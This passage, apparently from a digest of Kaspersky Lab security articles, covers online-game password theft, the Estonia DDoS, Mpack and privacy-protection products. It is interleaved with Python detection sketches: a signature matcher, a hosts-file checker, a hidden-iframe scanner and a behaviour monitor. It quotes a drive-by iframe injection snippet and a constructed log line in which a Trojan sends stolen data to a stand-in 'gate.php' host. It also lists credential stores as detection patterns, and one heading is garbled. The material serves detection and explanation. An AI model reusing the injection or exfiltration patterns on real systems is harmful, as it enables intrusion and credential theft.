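EXACT_SIGNATURE = b"STEALPW:send keys to mail"

def simple_comparison(data: bytes) -> bool:
    """Verdict by exact match of a single object against one sample."""
    return EXACT_SIGNATURE in data

# Complex comparison: an ordered template of fragments, matched
# case-insensitively, with the verdict expressed as a score in [0, 1].
TEMPLATE = [b"MZ", b"STEAL", b"keys", b"MAIL"]

def complex_comparison(data: bytes) -> float:
    """Fraction of template fragments found in order (case-insensitive)."""
    haystack = data.lower()
    pos = 0
    hits = 0
    for frag in TEMPLATE:
        idx = haystack.find(frag.lower(), pos)
        if idx != -1:
            hits += 1
            pos = idx + len(frag)
    return hits / len(TEMPLATE)

@dataclass
class Verdict:
    name: str
    status: str   # "malicious", "suspicious" or "clean"
    score: float

# Hypothetical event names a monitoring component might report (constructed).
SUSPICIOUS_EVENTS = {"write:hosts", "net:smtp", "hook:keyboard"}

def expert_verdict(name: str, data: bytes, events: list[str]) -> Verdict:
    """Rule-based combination of static score and behavioural events:
    exact signature -> malicious; template score of 0.75 or more plus a
    suspicious event -> malicious; high score alone -> suspicious."""
    score = complex_comparison(data)
    behaviour_hits = SUSPICIOUS_EVENTS.intersection(events)
    if simple_comparison(data):
        return Verdict(name, "malicious", 1.0)
    if score >= 0.75 and behaviour_hits:
        return Verdict(name, "malicious", score)
    if score >= 0.75:
        return Verdict(name, "suspicious", score)
    return Verdict(name, "clean", score)

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(fname, simple_comparison(blob), complex_comparison(blob))
    print(expert_verdict("variant.bin", SAMPLES["variant.bin"], ["hook:keyboard"]))
```

The mutated copy defeats the exact signature but still scores 1.0 against the flexible template, and only the rule that combines that score with a behavioural event turns it into a "malicious" verdict; this is the trade-off the article describes between proactivity and false positives, since the same rule would also need user confirmation or white lists in practice.&lt;br /&gt;&lt;br /&gt;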
She stresses that there is no universal or ‘best’ protection; each technology has its pluses and minuses. In choosing a product, the user should be guided by the results of independent tests, and reviews by users of established antivirus solutions.&lt;br /&gt;&lt;br /&gt;Online gaming and Virus Arena&lt;br /&gt;&lt;br /&gt;The article explains why online games have become so popular in recent years: they involve exploring magnificent virtual worlds and completing tasks - known as quests - which gain the players money, valuables and experience, not points as in a more traditional computer game. They can be purchased at stores or downloaded from the Internet, but in order to play there is usually a monthly subscription fee. The money from these monthly fees covers traffic costs, support for game servers and game development. New online games appear every year, and the number of players is constantly increasing.&lt;br /&gt;&lt;br /&gt;Online games are played on both legitimate and rogue game servers, which appear in approximately equal numbers. Rogue servers are very popular among users such as students and adolescents who have very little money – why waste money on subscription fees if it's possible to play the same game for free on a rogue server? However, the author stresses that rogue servers are often set up with the aim of making money not from subscription fees, but from the sale of virtual items to players in exchange for real money. Such sales may also be conducted by the administrators of official servers, depending on the server policy.&lt;br /&gt;&lt;br /&gt;The author does pose an interesting question – if server administrators are selling in-game items, is it legitimate for the players themselves to sell such items? The answer is yes, and this is often done in defiance of administrative rules. 
Certain sites on the Internet contain detailed information on the price of various in-game items, although such deals are, more often than not, illegal.&lt;br /&gt;&lt;br /&gt;Any in-game item can have a price in real money, which depends on demand. If there is a demand for certain in-game items or confidential data, they will be stolen. With particular knowledge, it is relatively easy to conduct such thefts – most game servers use passwords for authentication. Cyber criminal activity is often blocked by the administrators of official game servers. However, criminal or dubious activity is unlikely to be investigated by the administrators of rogue servers, and victims cannot rely on the support of the administrators.&lt;br /&gt;&lt;br /&gt;Online gamers are constantly targeted by cyber criminals, who use several methods in order to steal confidential data:&lt;br /&gt;&lt;br /&gt;Social engineering.&lt;br /&gt;One method used by cyber criminals is to enter a game or a forum on a game server and offer a bonus, or help in the game, in exchange for other players’ passwords. Naïve players looking for ways to make their life easier will often be tempted by such offers.&lt;br /&gt;&lt;br /&gt;Another well-known social engineering method is phishing, where the cyber criminal sends phishing emails, purportedly from the server administrators, which invite the player to authenticate his/her account via a website linked in the message.&lt;br /&gt;&lt;br /&gt;Although such password harvesting techniques are simple and reasonably effective, they don't result in much profit for malicious users, as more advanced, “wealthy” players don’t take the bait.&lt;br /&gt;&lt;br /&gt;Exploiting game server vulnerabilities.&lt;br /&gt;Just like any other software, game server code contains programming errors and bugs. 
Such potential vulnerabilities can be exploited by cyber criminals to gain access to server databases and harvest player passwords or password hashes (hashed passwords from which the original passwords can be recovered using dedicated programs). For instance, there is a known vulnerability linked to in-game player chat which arises if the chat environment is not isolated from the game database. This makes it possible for a malicious user to harvest passwords directly from in-game chat. &lt;br /&gt;&lt;br /&gt;The author highlights the fact that malicious users can exploit the system designed to remind users of forgotten passwords. The article also stresses that the number and type of vulnerabilities are directly linked to server status - creating patches for rogue servers (if the administrators bother to do this) takes longer than patching vulnerabilities on official servers.&lt;br /&gt;&lt;br /&gt;Exploiting game server vulnerabilities does require a certain amount of technical skill, which is why this method is not widely used.&lt;br /&gt;&lt;br /&gt;Using malware.&lt;br /&gt;This topic is covered extensively in the article. Malicious programs designed to steal passwords are spread using all means possible. Both malicious programs specifically tailored to steal any passwords and malicious programs which only target online game passwords may be used.&lt;br /&gt;&lt;br /&gt;Programs classified by Kaspersky Lab as Trojan-PSW and Trojan-Spy (which intercept data entered via the keyboard and then transmit it to a remote malicious user) and variants of the Trojan.Win32.Qhost family (which modifies the hosts file containing the mapping of network addresses to domain names) are used to harvest passwords. 
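&lt;br /&gt;&lt;br /&gt;The hosts-file modification attributed above to the Trojan.Win32.Qhost family leaves a trace a defender can check for: a name that should resolve to a legitimate server is mapped to some other address. The following is an added example, not code from the article or from Kaspersky Lab; the hosts file content and the list of watched domain suffixes are constructed, and the hostnames use reserved example and documentation ranges rather than any real service.&lt;br /&gt;

```python
"""Flag hosts-file entries that redirect watched hostnames to non-local
addresses, the kind of tampering described for Qhost-style Trojans.
The sample hosts content and the watch list are constructed for this example."""
import ipaddress

# Constructed sample hosts file; not taken from any real infection.
SAMPLE_HOSTS = """# constructed sample
127.0.0.1    localhost
::1          localhost
192.0.2.10   login.example-game.test    # game login host sent elsewhere
198.51.100.7 update.example-av.test     # antivirus update host sent elsewhere
0.0.0.0      ads.example.test
"""

# Hostnames (by suffix) that should never be redirected by a local hosts file.
# Assumed watch list for the example; a real deployment would use its own.
WATCHED_SUFFIXES = ("example-game.test", "example-av.test")

def parse_hosts(text: str) -> list[tuple[str, str]]:
    """Return (address, hostname) pairs, skipping comments and blank lines.
    One line may map several names to the same address."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        parts = line.split()
        if len(parts) > 1:
            for host in parts[1:]:
                pairs.append((parts[0], host.lower()))
    return pairs

def is_local(ip: str) -> bool:
    """True for loopback (127.0.0.1, ::1) and unspecified (0.0.0.0) addresses,
    which are the normal, harmless targets in a hosts file."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified

def suspicious_entries(text: str) -> list[tuple[str, str]]:
    """Watched hostnames mapped to anything other than a local address."""
    found = []
    for ip, host in parse_hosts(text):
        watched = any(host == s or host.endswith("." + s) for s in WATCHED_SUFFIXES)
        if watched and not is_local(ip):
            found.append((ip, host))
    return found

if __name__ == "__main__":
    for ip, host in suspicious_entries(SAMPLE_HOSTS):
        print("hosts file redirects", host, "to", ip)
```

Mapping an advertising host to 0.0.0.0 is a common and legitimate use of the hosts file, so the check deliberately ignores loopback and unspecified targets and only reports watched names sent to a routable address; on a live system the same check would be run over the contents of the operating system's own hosts file.&lt;br /&gt;&lt;br /&gt;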
Trojan-Spy.Win32.Delf has similar functionality, but configures a fake proxy server within the browser which is used when connecting to online game servers.&lt;br /&gt;&lt;br /&gt;Using malicious programs to harvest passwords has proved effective and simple, and consequently very popular.&lt;br /&gt;&lt;br /&gt;The article also covers the evolution of malicious programs which harvest passwords. The first recorded use of a malicious program to steal user passwords to online games was in 1997. Cyber criminals initially used classic keyloggers. The first Trojan specifically designed to target online games was Trojan-PSW.Win32.Lmir.a, which harvests passwords to "Legend of Mir". This program was the forerunner of a generation of Trojans targeting a wide range of online games.&lt;br /&gt;&lt;br /&gt;Trojan-PSW.Win32.OnLineGames.a was another significant development, as this Trojan targets nearly all popular online games. Each new variant includes new games to be targeted.&lt;br /&gt;&lt;br /&gt;A modern Trojan designed to steal passwords for online games is typically a dynamic library written in Delphi that automatically connects to all applications launched in the system. When it detects that an online game has been launched, this kind of malicious program intercepts the password entered via the keyboard, sends the data to the malicious user's email and then deletes itself.&lt;br /&gt;&lt;br /&gt;In addition to using Trojans to steal passwords, worms are also widely used. Their advantage is that they are able to infect executable files and to copy themselves to removable and network disks, as well as spreading via email.&lt;br /&gt;&lt;br /&gt;Currently, the most recent achievement by those writing viruses for online games is the polymorphic Virus.Win32.Alman.a and its successor, Virus.Win32.Hala.a. 
In addition to the ability to infect executable files, these programs are able to spread via network resources, mask their presence in the system, and contain a backdoor function.&lt;br /&gt;&lt;br /&gt;The authors of malicious code also attempt to protect their programs against antivirus solutions by using packers, anti-antivirus technologies, and rootkit technologies, which mask the presence of the malicious program in the system. Recent malicious programs which target online games include all three types of self-defense mechanism.&lt;br /&gt;&lt;br /&gt;The article also examines how attacks are conducted using a worm in order to harvest online gaming passwords. Malicious users create a worm with multiple functions: an email worm, network worm, p2p worm, rootkit, executable file infector and password stealing functionality all in one package. The worm will then be mass mailed, and an incautious user who clicks on a link in a malicious message can find himself in an unenviable position.&lt;br /&gt;&lt;br /&gt;The author covers password theft in terms of geographical location, stating that over 90% of all Trojans targeting online games are written in China, and 90% of the passwords stolen by these Trojans belong to players on South Korean sites. Computerization and the rapid growth of IT in Russia have naturally also had an impact on the evolution of computer entertainment – online games which do not have a separate client, but which are played within the browser have become extremely popular. This popularity has led to an increase in phishing attacks in which messages containing links to cloned gaming sites are spread. The article also includes statistics demonstrating the increase in the number of malicious programs, and the extent to which individual games are targeted by cyber criminals.&lt;br /&gt;&lt;br /&gt;The author concludes that those making a living from other people's virtual property are almost immune from a legal point of view. 
It is the game developers themselves who should tackle this issue, in conjunction with antivirus companies. In 2004, an agreement between Kaspersky Lab and the developers of the Russian online game Fight Club made it possible to prevent the theft of thousands of passwords and the sale of in-game items which would have been worth a five figure sum in 'real' US dollars.&lt;br /&gt;&lt;br /&gt;The article concludes by expressing the opinion that those who are being targeted (i.e. the gamers) should take matters into their own hands by using common sense, exercising caution and installing the best security solution available.&lt;br /&gt;&lt;br /&gt;MalwareVolution&lt;br /&gt;&lt;br /&gt;The events in Estonia in late April and early May will likely remain the most discussed events in 2007. Dozens of servers on the Estonian Internet were targeted by DDoS attacks after the Estonian police broke up a demonstration in Tallinn, where protestors spoke out against the Estonian government's decision to remove a monument from one of the city's central squares. (The monument commemorated Soviet soldiers who fell while liberating Estonia during WWII.) The websites of the president, the prime minister, the parliament, the police and a number of ministries were overloaded with an enormous number of requests from thousands of computers located around the world. In addition to the DoS attacks, which were primarily targeted at government websites, dozens of other Estonian websites were defaced. &lt;br /&gt;&lt;br /&gt;Estonian politicians blamed the Russian special services for the attacks. This was the first time that the word "cyberwar" was used by such highly placed officials. Estonia asked NATO to view the cyber attacks as military action and ultimately requested military protection from threats stemming from the Internet. &lt;br /&gt;&lt;br /&gt;What happened on the Russian Internet during this period? 
As soon as skirmishes between protesters and the police began in Estonia, many Russian Internet users took the only opportunity they had to voice their protest against the actions of the Estonian government - an online protest. This took the form of DoS attacks. A number of different programs began to appear on forums and websites, and they were used to send innumerable requests to Estonian websites. Any person could download this kind of program and launch it on their own computer. In technical terms, this creates a botnet. However, this botnet was constructed with the consent of computer owners who knew what they were doing. Of course, some of these attacks were sent from “real” botnets from previously infected machines, but one should not underestimate the power of this 'manual' attack. If such events can be called a cyberwar, then in this case the war involved guerilla combat. &lt;br /&gt;&lt;br /&gt;There was no substantial evidence for the participation of Russian government bodies in these attacks. However, now the problems of cyberwar and cyber terrorism are being discussed round the world, and not just by security professionals, but also by politicians and military experts. Cyber terrorism is clearly not being discussed in ways appropriate to the current situation: too much dangerous information is being published, and readers are offered ready-made cyber terrorist scenarios. Kaspersky Lab has always held the opinion that the publication and discussion of different ways to bring down a target cannot be described as anything but reprehensible. There is no doubt that any such information could provoke certain extremist groups to attempt to spark off a similar scenario. And now Pandora’s box has been opened. &lt;br /&gt;&lt;br /&gt;The biggest global event in the cell phone industry in the second quarter of 2007 - or probably the entire year - was the release of Apple's new iPhone. 
Sales over the first 18 months are predicted to reach 13.5 million units. Will the iPhone’s popularity act as a tipping point, upsetting the stagnant status quo in the world of mobile viruses? Our estimate is that 2008 will be the year in which virus problems for the iPhone become a reality. Malicious programs for the iPhone probably won't be worms. Instead, they will probably be typical file viruses and a variety of Trojans. But the biggest threat for iPhone users will be the different vulnerabilities that could be used by malicious users to access information stored on the phone. &lt;br /&gt;&lt;br /&gt;Mpack. The authors of malicious programs have begun giving preference to using various vulnerabilities in order to penetrate systems. In mid-June this year, over six thousand Italian servers were detected with websites that included a few strings of malicious html, similar to: &lt;br /&gt;&lt;br /&gt;&lt;iframe src='[address]' width=5 height=5&gt; &lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;This is a typical construction used to exploit a range of browser vulnerabilities and Kaspersky Lab analysts have been very familiar with it for a number of years now. What happens, and how? There is a bundle of exploits that take advantage of vulnerabilities in popular web browsers and operating systems. Malicious users post these exploits on their own website. In order to attract users to visit the site, they gain access to other websites, usually by using account access information that was previously stolen by a Trojan. Then, the iframe tag is added to all of these sites. The tag leads back to the infected site with the exploits; its tiny dimensions mean the visitor sees nothing while the exploit page loads. In the end, a Trojan Downloader is usually installed on the system under attack, which makes it possible to download more viruses, worms, backdoors, spyware, etc to the victim machine. &lt;br /&gt;&lt;br /&gt;We were surprised that Mpack made it beyond the borders of Russia and was used in Italy. 
Here’s why: Mpack was created in Russia and was sold by Russian hackers to other Russian hackers. Its authors were very active in creating and supporting the spread of the Trojan LdPinch. There are several other similar exploit bundles on the black market: Q406 Roll-up package, MDAC, WebAttacker, etc. All of these analogues have better 'success' rates when it comes to infecting systems than does Mpack. &lt;br /&gt;&lt;br /&gt;We believe that the biggest problem is that it is extremely difficult to hold the authors of Mpack criminally responsible. They simply take exploits which were identified by other people and then published on IT security websites in the interests of improving security, but they take no responsibility for how these exploit bundles will be used. This is where we come to the age-old question: does disclosing information about vulnerabilities do more harm than good? We promise to return to this issue and voice our views on what’s going on today in terms of blackhat vs. whitehat. &lt;br /&gt;&lt;br /&gt;In mid May we detected three variants of a new Trojan for cell phones: Trojan-SMS.SymbOS.Viver. This Trojan sends text messages to premium numbers. As a result, the subscriber who falls victim is charged a certain amount of money which is then transferred to the malicious user's account. In May we registered three such incidents, which just goes to show once again that today’s mobile technologies are continuing to attract the interest of cyber criminals. Unfortunately, we do not have statistics for most other countries, but it’s difficult to believe that this is an exclusively Russian problem. &lt;br /&gt;&lt;br /&gt;The key events of the second quarter discussed in this report are certainly food for thought, but they still do not answer the question: what is the next step for viruses and information threats? 
Despite the emergence of new operating systems (such as Windows Vista), new services (mobile content) and devices (the iPhone), cyber criminals continue to lack initiative and are using tried and tested ways of attacking Internet users. Furthermore, we are seeing a significant return to “the sources”: computers are increasingly the targets of DDoS attacks and attacks that use browser vulnerabilities to penetrate the system. Probably the only thing that distinguishes the present from three years ago is the fact that email is not being used as the primary vehicle for spreading viruses. Instead, instant messaging services are one of today’s key means of distribution. Another difference is that there has been an explosive increase in Trojans targeting the users of online games. The threats are not becoming “smarter.” Innovation has stagnated as development is now focused on cosmetic changes, and we still don't know what may ultimately serve as a catalyst for global changes to the virus landscape in the near future. &lt;br /&gt;&lt;br /&gt;Antivirus companies have considerably improved their technologies and introduced several new technologies. Presently, antivirus company clients are protected much more effectively than two years ago. The average time that most new malicious programs survive in the wild has been cut down to a number of hours, and is rarely ever counted in days anymore. &lt;br /&gt;&lt;br /&gt;But let’s predict what will happen next. Malicious users will attempt to reach beyond the protection offered by antivirus solutions - a task that is a shift from “getting around” antivirus programs and implies more action in fields that have not yet been mastered by quality antivirus protection, or areas in which protection is not an option for any number of reasons. This is more than likely where the new front will be in the information war: online games, blogs, instant messaging and file swapping networks. 
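&lt;br /&gt;&lt;br /&gt;The injected-iframe construction quoted in the Mpack section of this report is something a site owner can scan for. The following Python script is an added example, not code from the report: it walks a page with the standard library HTML parser and reports iframes that are too small to see or hidden by style, noting when their src points at a third host. The sample page, its domain and the 203.0.113.7 address are constructed for the example; in the sample the angle brackets are written as \x3c and \x3e escapes.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page mimicking a site that had a tiny iframe appended to its HTML.
# Angle brackets are written as \x3c and \x3e escapes; the injected src host
# 203.0.113.7 is a documentation address, not a real exploit server.
SAMPLE_PAGE = (
    "\x3chtml\x3e\x3cbody\x3e\x3ch1\x3eBenvenuti\x3c/h1\x3e"
    "\x3cp\x3eSite content.\x3c/p\x3e"
    "\x3ciframe src='http://203.0.113.7/in.php' width=5 height=5\x3e \x3c/iframe\x3e"
    "\x3ciframe src='https://www.example.com/player' width='640' height='360'\x3e\x3c/iframe\x3e"
    "\x3c/body\x3e\x3c/html\x3e"
)


def pixels(value):
    """Parse a width/height attribute; None for percentages or missing values."""
    if value is None:
        return None
    digits = value.strip().lower().removesuffix("px")
    return int(digits) if digits.isdigit() else None


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are too small to see or hidden by inline style."""

    def __init__(self, page_host, max_px=10):
        super().__init__()
        self.page_host = page_host
        self.max_px = max_px          # anything this size or smaller counts as invisible
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            px = pixels(a.get(dim))
            if px is not None and self.max_px >= px:
                reasons.append(f"{dim}={px}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if not reasons:
            return                    # a normally sized, visible embed
        src = a.get("src", "")
        src_host = urlparse(src).hostname or ""
        if src_host and src_host != self.page_host:
            reasons.append(f"third-party src {src_host}")
        self.findings.append((src, reasons))


def find_hidden_iframes(html, page_host):
    """Return [(src, [reasons])] for every suspicious iframe in the page."""
    finder = HiddenIframeFinder(page_host)
    finder.feed(html)
    return finder.findings


if __name__ == "__main__":
    for src, reasons in find_hidden_iframes(SAMPLE_PAGE, "www.example.com"):
        print(src, "->", ", ".join(reasons))
```

The 10-pixel cutoff is an assumption; it catches the 5x5 frame from the report, and the same rule covers width=0 and style-hidden frames. A 640x360 player from the site's own host produces no finding, which keeps the scan usable on pages with legitimate embeds.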
&lt;br /&gt;&lt;br /&gt;Saving your private RYAN against A smart Virus&lt;br /&gt;&lt;br /&gt;Classifying methods used to steal data&lt;br /&gt;The United States Federal Trade Commission (FTC) views the issue of the theft of confidential data in the broadest sense. Their website provides information about many traditional "non-computerized" means of stealing information, such as stealing wallets and purses, searching through shredded papers that have been thrown in the garbage, making calls allegedly from a financial institution, and using special devices to scan credit card numbers, to name a few.&lt;br /&gt;&lt;br /&gt;However, in addition to all these techniques, there are other ways of stealing information. There are at least three different ways to steal data using a computer. The first is when the computer user voluntarily gives information to a malicious user, having trusted a false request for said information. These requests usually come in the form of mass mailings. The malicious user will have created a false website that imitates the site of an actual bank or other financial organization. This kind of computer crime is called phishing.&lt;br /&gt;&lt;br /&gt;The second way to steal confidential information involves tracking and logging a user's actions. This kind of electronic espionage is carried out using Trojans which Kaspersky Lab classifies as Trojan-Spy programs. One of the most popular kinds of Trojan-Spy program is the keylogger, covered in detail in a previous article.&lt;br /&gt;&lt;br /&gt;The third technique for stealing confidential data involves the use of malicious programs (most often Trojans) to search for confidential information on a user’s computer and then transmit this data to a malicious user. In this case, a malicious user may only receive data that the user considered important enough to store on the computer. 
However, this seeming drawback is compensated for by the fact that the data is transmitted without user participation. For more details about this technique, see: http://www.viruslist.com/en/virusesdescribed?chapter=152540521.&lt;br /&gt;&lt;br /&gt;These malicious programs can spread in a number of ways: they can be activated when an email attachment is opened or when a user clicks on a link sent via instant messaging. They can also launch when a file is opened from a directory on a peer-to-peer network or by using scripts on a website that take advantage of vulnerabilities in web browsers, making it possible for these programs to launch automatically when users visit these sites. Such programs can also be spread via other previously installed malicious programs that are capable of downloading and installing them to the system.&lt;br /&gt;&lt;br /&gt;Malicious programs like PSW Trojans are designed to access a range of information about the system, the user and passwords to a number of programs and operating system services. In order to do this, they scan all storage areas which contain relevant data: Windows Protected Storage, registry keys and certain program files of interest to a malicious user (usually instant messaging clients, email systems and Internet browsers).&lt;br /&gt;&lt;br /&gt;After gathering data, the Trojan will usually encrypt it and compress it into a small binary file. Later, the file may be sent via email or placed on the malicious user's FTP server.&lt;br /&gt;&lt;br /&gt;The way in which the abovementioned malicious programs function is covered in detail in "Computers, Networks and Theft", which examines two different techniques used by modern security solutions to protect confidential data.&lt;br /&gt;&lt;br /&gt;How do today's products protect confidential data?&lt;br /&gt;Almost all modern security solutions (such as Internet Security suites) include a component which protects confidential data, typically called Privacy Control. 
(In some applications, this component is combined with other security components, such as an anti-phishing component.) The key purpose of this component is to protect confidential information on the user's computer against unauthorized access and transmission.&lt;br /&gt;&lt;br /&gt;Let’s take a look at how Symantec products implement protection for confidential data. This company was chosen because they were one of the first to implement protection for confidential data in their products, before other market players followed suit and added their own, similar components.&lt;br /&gt;&lt;br /&gt;Back in late 1999, Symantec published information about their new product, Norton Internet Security 2000. This featured the new Norton Privacy Control, with one of its key modules being Confidential Data Blocking.&lt;br /&gt;&lt;br /&gt;This component works in the following way: &lt;br /&gt;&lt;br /&gt;the user must enter all data he considers confidential, &lt;br /&gt;the product will then analyze all outgoing traffic from the user’s computer and either "cut up" all outgoing confidential data, or substitute it with meaningless symbols (such as “*”).&lt;br /&gt;&lt;br /&gt;Figure 1. Norton Internet Security 2000 Confidential Data component&lt;br /&gt;&lt;br /&gt;Norton’s Privacy Control component is included in new Norton products, such as Norton Personal Firewall and Norton Internet Security.&lt;br /&gt;&lt;br /&gt;The company’s latest flagship product is Norton360, which was released by Symantec in 2007. The Privacy Control component is also included in Norton360, but not in the regular package. Instead, it comes as an Add-on Pack which can be downloaded from Symantec's official website.&lt;br /&gt;&lt;br /&gt;Figure 2. 
Norton360 Confidential Data Blocking component &lt;br /&gt;&lt;br /&gt;The main idea behind the product remains unchanged: just as in Norton Internet Security 2000, it uses a table into which the user is meant to enter his confidential data (see figure 2).&lt;br /&gt;&lt;br /&gt;Drawbacks in traditional approaches to protecting confidential data&lt;br /&gt;What made the program’s developers decide to remove the Confidential Data protection component from the list of standard Norton360 modules? There are probably several reasons, but one stands out in particular. The truth is that this approach to protecting confidential information is not effective - it only creates the illusion of security.&lt;br /&gt;&lt;br /&gt;Some official descriptions of the latest version of Norton Internet Security say that it "blocks […] transmitting unauthorized information". However, this is not actually the case.&lt;br /&gt;&lt;br /&gt;If you look carefully at the first window in Figure 2, you can see a note in the lower half of the window: “Norton Add-on Pack cannot block confidential information on secure Web sites. However, secure Web sites already ensure your data is safe.” The reason for this note is simple: data exchange with secure websites is encrypted with SSL/TLS inside the browser, so a component that inspects outgoing traffic below that layer cannot see, let alone match, the data transmitted.&lt;br /&gt;&lt;br /&gt;A confidential data protection component should protect users from Trojans like PSW Trojans. What prevents a Trojan from encrypting all data being transmitted? Nothing, actually, and over 80% of Trojans do just that. 
That is why the confidential data protection component - which is based on traffic analysis and searching for previously entered data sequences - is not capable of preventing data from being sent out in most cases, since it simply will not find the data once it has been encrypted by a Trojan.&lt;br /&gt;&lt;br /&gt;Furthermore, storing all your confidential information in one place after entering the data in windows like the ones in Figure 2 cannot do anything to increase security. On the contrary, instead of having to search through all kinds of data in several places on a computer's file system, a malicious user knows right where to go and all he has to do is gain access to the file used by the protection component. There is no doubt that developers do everything they can to secure the data entered by the user, but security cannot be guaranteed.&lt;br /&gt;&lt;br /&gt;An example of how this component works is as follows: if a webpage asks you to enter your telephone number, Norton Internet Security 2000 will ask you if you are sure that you want to send this confidential data after you have entered it into the text field. However, that warning is not especially helpful in real life, since the user decision to enter the requested information is based on whether or not s/he trusts the website. If the user believes the website is authentic, then the program warning will not stop the user from entering data. 
If the user believes the website is fraudulent, then he will not bother to enter any data in the first place.&lt;br /&gt;&lt;br /&gt;Unfortunately, today there are more and more fraudulent websites designed by malicious users to look very similar to the official websites of financial institutions, and users willingly enter their confidential data despite security solution warnings.&lt;br /&gt;&lt;br /&gt;An alternative approach to protecting confidential data&lt;br /&gt;There is another approach to protecting confidential data based on blocking the actions of malicious programs at earlier stages, before data is transmitted, and before it is too late.&lt;br /&gt;&lt;br /&gt;In order to steal confidential information, a malicious program must take two actions: find the information and extract it from wherever it is being stored (that could be a file, a registry key, or an operating system's special storage area) and transmit it to the author of the malicious program via specific channels. Since many computers already have firewalls installed which control the network activity of applications on the computer, the malicious program cannot transmit any collected data under its own name. That is why many PSW Trojans use different tactics to evade firewall protection, making them able to send data without the user's knowledge.&lt;br /&gt;&lt;br /&gt;It should then follow that the protection component should track the activity of applications when that activity is indicative of a potential attempt to steal confidential information:&lt;br /&gt;&lt;br /&gt;An attempt to gain access to personal data or passwords located in Microsoft Windows’ Protected Storage. &lt;br /&gt;This service is used to store confidential data, such as local passwords, passwords for POP and SMTP email servers, Internet access passwords, passwords for automatic access to closed website sections, other Internet data and passwords for automatically filling out Internet forms, and other information. 
These data are entered into the relevant text field of email clients and web browsers. As a rule, the user may store the entered data; in order to do so, he needs to mark it with a special flag. In this case, the data that is entered is stored in Microsoft Windows Protected Storage.&lt;br /&gt;&lt;br /&gt;Even users who are concerned about information leaks and do not save passwords or other data in their Internet browser usually save their email passwords, since entering their password each time they receive or send something is too time consuming. Since many Internet providers use the same password for email and for Internet access, obtaining this password will give a malicious user access to both the email account and the Internet connection settings.&lt;br /&gt;&lt;br /&gt;Attempts to send data stealthily. &lt;br /&gt;In order to transmit the data it has collected, a malicious program will try different tactics to get around a firewall if one is installed on the victim computer. For example, it may stealthily launch an Internet browser process and transmit data using program interfaces common to most browsers (COM, OLE, DDE and others). Since most modern firewalls have a set of pre-installed settings that permit network activity for trusted applications, the firewall will not react to the transmission of data by the Internet browser and the user will not be aware of this activity nor will he be able to prevent the data leak.&lt;br /&gt;&lt;br /&gt;When using this approach, encryption of stolen data by a malicious program is not a problem, as the malicious program's payload will be blocked before encrypted information can be transmitted. 
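&lt;br /&gt;&lt;br /&gt;As an added illustration of the two approaches compared above (not Symantec's or Kaspersky's code, and not taken from the article), the following Python sketch first runs a Privacy Control style verbatim-secret filter against a payload that a PSW Trojan has XOR-encoded and base64-wrapped, then runs a behaviour rule of the kind described in the two points above over a constructed host-monitor event log. The event format, the process names (ldpinch.exe is a label for the example, not a file name from the real sample), the credential-store markers and the trusted-reader list are all assumptions made for the example.

```python
import base64
import json

# Secrets the user typed into a Privacy Control style table (constructed).
USER_SECRETS = ["hunter2", "pop3-password-99"]


def traffic_filter_blocks(payload, secrets=USER_SECRETS):
    """Traffic-matching approach: block only if a listed secret appears verbatim."""
    return any(s.encode() in payload for s in secrets)


def trojan_package(secrets, key=0x5A):
    """Stand-in for what a PSW Trojan does before sending: serialise, XOR, base64.

    Real samples use proper ciphers; a single-byte XOR is already enough to show
    that substring matching on the wire never sees the plaintext.
    """
    blob = json.dumps({"passwords": secrets}).encode()
    return base64.b64encode(bytes(b ^ key for b in blob))


# Constructed host-monitor event log: (pid, process, event type, detail).
# Process names, paths and COM calls are illustrative, not captured from a real sample.
SAMPLE_EVENTS = [
    (4321, "ldpinch.exe", "read", "HKCU\\Software\\Microsoft\\Protected Storage System Provider"),
    (4321, "ldpinch.exe", "read", "C:\\Program Files\\The Bat!\\account.cfg"),
    (4321, "ldpinch.exe", "com_create", "InternetExplorer.Application"),
    (4321, "ldpinch.exe", "com_call", "Navigate http://203.0.113.9/gate.php"),
    (1200, "outlook.exe", "read", "HKCU\\Software\\Microsoft\\Protected Storage System Provider"),
    (1200, "outlook.exe", "connect", "pop.example.net:110"),
]

# Locations a credential harvester reads, and the applications that legitimately read them
# (hypothetical lists; a real product ships and maintains these itself).
CREDENTIAL_STORES = ("Protected Storage System Provider", "account.cfg", "\\Mozilla\\Firefox\\Profiles\\")
TRUSTED_STORE_READERS = {"outlook.exe", "iexplore.exe", "msimn.exe", "thebat.exe"}


def behaviour_alerts(events):
    """Behaviour-based approach: alert on the harvest and on the stealthy send."""
    alerts = []
    harvesters = set()            # pids of untrusted processes that touched a credential store
    for pid, proc, kind, detail in events:
        if kind == "read" and any(marker in detail for marker in CREDENTIAL_STORES):
            if proc.lower() not in TRUSTED_STORE_READERS:
                harvesters.add(pid)
                alerts.append((pid, proc, "credential store access", detail))
        elif kind in ("com_create", "com_call") and pid in harvesters:
            # Driving a trusted browser over COM lets the firewall's "allow browser"
            # rule carry the stolen data out, so the automation itself is the signal.
            if detail.startswith("InternetExplorer.Application") or detail.startswith("Navigate "):
                alerts.append((pid, proc, "stealth send via browser automation", detail))
    return alerts


if __name__ == "__main__":
    wire = trojan_package(USER_SECRETS)
    print("plaintext blocked:", traffic_filter_blocks(b"user=bob;pass=hunter2"))
    print("encoded blocked:", traffic_filter_blocks(wire))
    for alert in behaviour_alerts(SAMPLE_EVENTS):
        print(alert)
```

The two functions make the article's point together: the filter has no chance once the Trojan encodes its payload, whereas the behaviour rule fires on the read of the credential store and again on the browser automation, both of which happen before any byte reaches the network. Outlook reads the same Protected Storage location and raises nothing, because the rule keys on who is reading, not on what is read.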
